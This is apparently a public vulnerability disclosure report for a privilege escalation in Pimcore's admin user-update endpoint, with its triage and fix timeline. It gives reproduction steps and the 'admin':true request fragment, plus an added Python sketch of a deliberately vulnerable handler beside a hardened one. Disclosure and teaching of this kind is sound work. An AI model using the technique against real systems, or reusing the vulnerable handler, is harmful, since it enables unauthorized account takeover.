privilege escalation with least config in pimcore/pimcore

Valid

Reported on

May 9th 2023


Description

A user with only minimal permissions can escalate their own account to the admin role.

Proof of Concept

Log in at https://11.x-dev.pimcore.fun/admin/
In Settings -> Users, add a new user that has only the "users" permission (Permissions -> users).
Then log in as that new user and go to Settings -> Users -> the new user.
Update the new user with the following payload, where id is the id of the new user,
sent to the API endpoint PUT /admin/user/update:

The key reason is that the request sets admin to true: the fragment %22admin%22%3Atrue%2C decodes to "admin":true, and the server accepts it from a non-admin user.
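To show the authorization defect behind this report and what a fix has to check, here is an added Python example (not Pimcore's code; the handler functions, the requester structure and the sample body are constructed for illustration). It decodes a form body in the same shape as the PoC request and contrasts a weak update handler, which writes every field it is given, with a hardened one that refuses to let a non-admin set the admin flag or grant permissions they do not hold themselves:

```python
import json
from urllib.parse import parse_qs, urlencode

# Constructed requester: like the new user in the report, it holds only the
# "users" permission and is not an admin.
REQUESTER = {"id": 6, "admin": False, "permissions": {"users"}}


def build_body(user_id, data):
    """Build a form body in the shape of PUT /admin/user/update (id + JSON in 'data')."""
    return urlencode({"id": user_id, "data": json.dumps(data)})


def parse_body(body):
    """Decode the id and the URL-encoded JSON in 'data' (the PoC payload's shape)."""
    form = parse_qs(body, strict_parsing=True)
    return int(form["id"][0]), json.loads(form["data"][0])


def vulnerable_update(requester, body):
    """Weak handler: anyone with the users permission may write every field,
    including 'admin'. This is the behaviour the report describes."""
    user_id, data = parse_body(body)
    if "users" not in requester["permissions"]:
        raise PermissionError("users permission required")
    return {"id": user_id, **data}


def hardened_update(requester, body):
    """Hardened handler: only an admin may set the admin flag, and a non-admin
    may only grant permission_* keys that they hold themselves."""
    user_id, data = parse_body(body)
    if "users" not in requester["permissions"]:
        raise PermissionError("users permission required")
    if not requester["admin"]:
        if data.get("admin"):
            raise PermissionError("only an admin may grant the admin flag")
        for key, value in data.items():
            if key.startswith("permission_") and value:
                if key[len("permission_"):] not in requester["permissions"]:
                    raise PermissionError(f"cannot grant {key} you do not hold")
    return {"id": user_id, **data}


def escalation_blocked(handler, requester, body):
    """Return True when the handler rejects the update with PermissionError."""
    try:
        handler(requester, body)
    except PermissionError:
        return True
    return False
```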

Impact

A newly created user with minimal permissions can escalate their privileges to admin.

We are processing your report and will contact the pimcore team within 24 hours. 7 months ago
duyhm1995 modified the report
7 months ago
We have contacted a member of the pimcore team and are waiting to hear back 7 months ago
pimcore/pimcore maintainer has acknowledged this report 7 months ago
Divesh Pahuja modified the Severity from High (8.1) to Medium (6.5) 7 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Divesh Pahuja validated this vulnerability 7 months ago
duyhm1995 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Divesh Pahuja
6 months ago

Hi @duyhm1995, please change the affected version to 10.5.22, as the issue was fixed in 10.5.23. Thanks!

duyhm1995
6 months ago

Researcher


Hi @dvesh3, the edit feature has been disabled in this report, so I can't update them.

Divesh Pahuja
6 months ago

@admin can you please help in updating the affected version to 10.5.22 here? thanks!

Ben Harvie
6 months ago

Admin


On it :)

Divesh Pahuja
6 months ago

@benharvie sorry one more thing, the package also needs to be changed to pimcore/pimcore

Divesh Pahuja
6 months ago

@admin can you please update the repository to pimcore/pimcore?

Ben Harvie
6 months ago

Admin


Hey Divesh, the repository has been updated as requested.

Divesh Pahuja
6 months ago

Thanks Ben!!

Divesh Pahuja marked this as fixed in 10.5.23 with commit c8f37b 6 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
Divesh Pahuja published this vulnerability 6 months ago